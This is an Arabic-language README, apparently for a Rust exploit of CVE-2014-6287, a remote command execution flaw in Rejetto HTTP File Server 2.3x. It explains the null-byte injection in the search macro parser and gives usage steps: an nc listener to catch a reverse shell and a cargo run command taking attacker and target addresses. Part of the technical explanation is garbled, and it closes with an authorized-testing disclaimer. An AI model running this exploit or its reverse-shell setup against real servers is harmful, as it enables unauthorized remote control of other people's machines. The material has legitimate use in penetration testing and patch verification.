
تنفيذ بلغة Rust لاستغلال CVE-2014-6287 الذي يستهدف خادم ملفات Rejetto HTTP File Server (HFS) الإصدارات 2.3x قبل 2.3c.
تنفيذ بلغة Rust لاستغلال CVE-2014-6287 الذي يستهدف خادم ملفات Rejetto HTTP (HFS) الإصدارات 2.3x قبل الإصدار 2.3c.
CVE-2014-6287 هي ثغرة حرجة لتنفيذ الأوامر عن بُعد في خادم ملفات Rejetto HTTP (HFS).
تسمح الدالة findMacroMarker في parserLib.pas في خادم ملفات Rejetto HTTP للمهاجمين عن بُعد بتنفيذ برامج عشوائية عبر تسلسل %00 في إجراء البحث. تمكّن هذه الثغرة المهاجمين من تجاوز التحقق من صحة المدخلات وحقن كود خبيث يتم تنفيذه على النظام المستهدف.
يعمل الاستغلال عبر:
%00){. و .}قبل تنفيذ الاستغلال، قم بإعداد مستمع على جهازك المهاجم لالتقاط الشل العكسي:
# Replace <LPORT> with your desired listening port
nc -lvnp <LPORT>
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
-l, --lhost <LHOST>: عنوان IP المحلي الخاص بك (جهاز المهاجم)-p, --lport <LPORT>: المنفذ المحلي الخاص بك للشل العكسي-r, --rhost <RHOST>: عنوان IP الهدف (خادم HFS المتأثر)-t, --rport <RPORT>: المنفذ الهدف (الافتراضي: 80)هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح